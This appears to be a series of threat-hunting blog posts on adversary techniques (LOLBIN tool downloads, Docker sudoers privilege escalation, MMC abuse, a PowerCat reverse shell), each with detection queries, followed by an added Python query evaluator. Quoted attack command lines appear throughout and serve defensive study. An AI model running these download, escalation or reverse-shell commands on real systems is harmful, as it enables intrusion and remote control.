Posts

334. Adversaries Use Device Credential Deployment for Hiding Artifacts

Hello everyone! Today we'll look at an example of how adversaries use Device Credential Deployment to hide a console window - Hide Artifacts: Hidden Window (T1564.003). According to this report, the adversary leveraged DeviceCredentialDeployment.exe to stealthily run cmd.exe. This binary shouldn't run under normal circumstances, so it may point to malicious activity and is a good target for hunting:

event_type: "processcreatewin" AND proc_file_originalfilename: "devicecredentialdeployment.exe"

See you tomorrow!

333. Adversaries Use Multiple LOLBINs for Ingress Tool Transfer

Hello everyone! In almost every case adversaries need to download additional tools to the compromised system, and very often they use LOLBINs to solve this task. Let's look at some of them. For example, according to this report, the adversary leveraged multiple LOLBINs:

bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe

curl -o $public\libraries\service.exe http://<HOST>/service.exe

certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar

powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'

Such activities are great targets for hunting and detection, so make sure you are covering them. For example, BITSAdmin:

event_type: "processcreatewin" AND proc_file_path: "bitsadmin.exe" AND cmdline: "transfer"

See you tomorrow!

332. That's How Shai-Hulud 2.0 Escalates Privileges

Hello everyone! I'm sure you have already heard about Shai-Hulud (we even talked about it already), but let's look at the new version and focus on the privilege escalation tactic. So, here's the report. Let's look at Figure 11. First, the adversary checks whether passwordless sudo access is available:

sudo -n true

If not, it leverages Docker's privileged container access to mount the host filesystem and modify the sudoers configuration file:

docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner"

Both can be good hunting opportunities! Let's start with sudo:

event_type: "processcreatenix" AND cmdline: "sudo -n true"

And for Docker abuse:

event_type: "processcreatenix" AND cmdline: ("docker" AND "run" AND "privileged" AND "cp" AND "sudoers.d")

See you tomorrow!

331. Adversaries Keep Abusing Microsoft Management Console

Hello everyone! Today we'll look at another example of proxy execution, and focus on the following sub-technique: System Binary Proxy Execution: MMC (T1218.014). According to this report, Water Gamayun leveraged malicious MSC files, which exploited MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe and used TaskPad snap-in commands to run PowerShell commands, for example:

powershell.exe" -w H -eC aQBlAHgAIAAoACcAcABvAF8AdwBlAF8AcgBzAF8AaABlAF8AbABsACAALQBlAF8AQwAgAFMAUQBCAHUAQQBIAFkAQQBiAF8AdwBCAHIAQQBHAFUAQQBMAFEAQgBYAEEARwBVAEEAWQBnAEIAUwBBAEcAVQBBAGMAUQBfAEIAMQBBAEcAVQBBAGMAdwBCADAAQQBDAEEAQQBMAFEAQg[redacted]

So, in this case, mmc.exe spawns powershell.exe. We can transform this into a query:

event_type: "processcreatewin" AND proc_p_file_path: "mmc.exe" AND proc_file_path: "powershell.exe"

See you tomorrow!

330. Adversaries Use Windows Event Logs for Discovery

Hello everyone! We often use Windows Event Logs during our incident response engagements, but adversaries may also use them, for example, for discovery. Let's dig into this report. The adversary leveraged SharpADUserIP, which enables them to collect user names and their IP addresses from the Security log, as well as the following PowerShell command to extract similar information from Microsoft-Windows-TerminalServices-LocalSessionManager/Operational:

powershell -Command Get-WinEvent -LogName 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' | Where-Object {$_.Id -eq 21} | ForEach-Object { $eventXml = [xml]$_.ToXml(); $username = $eventXml.Event.UserData.EventXML.User; $ipAddress = $eventXml.Event.UserData.EventXML.Address; $loginTime = $_.TimeCreated; if ($username -and $ipAddress -and $loginTime) { Write-Output ('User: ' + $username + ' IP: ' + $ipAddress + ' Login Time: ' + $loginTime) }}

So, we can hunt for suspicious...

329. Adversaries Use Blender 3D Files to Deliver Stealers

Hello everyone! I always love to see creative ways of malware delivery. This time adversaries leveraged malicious .blend files uploaded to free 3D asset sites. According to the report, an embedded Python script fetched a loader, a PowerShell script, from a workers[.]dev URL. The script downloads two archives: one contains a Python environment with StealC, the other a Python stealer. So, what to hunt for? Some examples:

- Execution of suspicious .blend files.
- Communications with workers[.]dev initiated by suspicious processes.
- Suspicious LNK files in the Startup folder.
- Execution of suspicious Python scripts (yes, they are suspicious, for example ZalypaGyliveraV1.py).

See you tomorrow!

328. Adversaries Use PowerCat for Reverse Shells

Hello everyone! I've already mentioned that sometimes threat actors want to be caught. Let's look at another case and a tool I don't often see used ITW. According to this report, the adversary leveraged PowerShell to download and execute PowerCat, an open-source PowerShell-based Netcat utility, to start a reverse shell:

powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString ('hxxps://raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat.ps1'); powercat -c 154.17.26[.]41 -p 8080 -e cmd

As you may have noticed, the adversary didn't rename the tool, and in many cases that is a very common practice. The same can be said about the repository: threat actors often abuse PowerShell to download tools from official sources. So, it's another notable thing to document and build your detections on, for example:

event_type: "processcreatewin" AND cmdline: "powercat"

Don't forget about the script block - it also contains...
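All of the hunting queries in posts 334, 333, 332, 331 and 328 share one small dialect: field: "value" clauses joined with AND, with parentheses grouping several values for one field. Below is an added example, not code from the posts or from any product: a minimal Python evaluator for that dialect, run over constructed process-creation events. It assumes that each clause is a case-insensitive substring match on the named field and that AND is the only operator.

```python
import re

# Tokens of the posts' query dialect: a quoted value, a field name followed by
# a colon, parentheses, and the AND keyword; whitespace between tokens is skipped.
TOKEN = re.compile(r'\s*(?:"([^"]*)"|([A-Za-z_]\w*)\s*:|(\()|(\))|(AND))')

def parse_query(text):
    """Reduce a query to [(field, [needle, ...]), ...]; all clauses are ANDed, so parentheses only group (assumption: no OR/NOT)."""
    clauses, field, values, pos = [], None, [], 0
    text = text.strip()
    while pos < len(text):
        m = TOKEN.match(text, pos)
        if not m:
            raise ValueError(f"unparsable query near {text[pos:pos + 20]!r}")
        pos = m.end()
        string, name = m.group(1), m.group(2)
        if name:                      # a new 'field:' clause begins
            if field is not None:
                clauses.append((field, values))
            field, values = name, []
        elif string is not None:      # a value belonging to the open clause
            if field is None:
                raise ValueError("value without a field")
            values.append(string.lower())
    if field is not None:
        clauses.append((field, values))
    return clauses

def matches(event, clauses):
    """Assumed semantics: case-insensitive substring test on each named field."""
    return all(all(v in event.get(f, "").lower() for v in vals) for f, vals in clauses)

def hunt(events, query):
    """Return the ids of the events the query would surface."""
    clauses = parse_query(query)
    return [e["id"] for e in events if matches(e, clauses)]

# Constructed sample telemetry (not taken from the reports the posts cite).
EVENTS = [
    {"id": "e1", "event_type": "processcreatewin", "proc_p_file_path": r"C:\Windows\System32\cmd.exe",
     "proc_file_path": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer www /download http://host.invalid/winupdate.exe C:\Users\Public\libraries\winvt.exe"},
    {"id": "e2", "event_type": "processcreatewin", "proc_p_file_path": r"C:\Windows\System32\mmc.exe",
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -w H -eC <redacted>"},
    {"id": "e3", "event_type": "processcreatewin", "proc_p_file_path": r"C:\Windows\explorer.exe",  # benign parent
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe"},
    {"id": "e4", "event_type": "processcreatenix", "proc_file_path": "/usr/bin/docker",
     "cmdline": 'docker run --rm --privileged -v /:/host ubuntu bash -c "cp /host/tmp/runner /host/etc/sudoers.d/runner"'},
]
```

Running the posts' own queries through hunt(EVENTS, ...) surfaces e1 for the BITSAdmin query, e2 but not e3 for the mmc.exe parent query, and e4 for the Docker sudoers query.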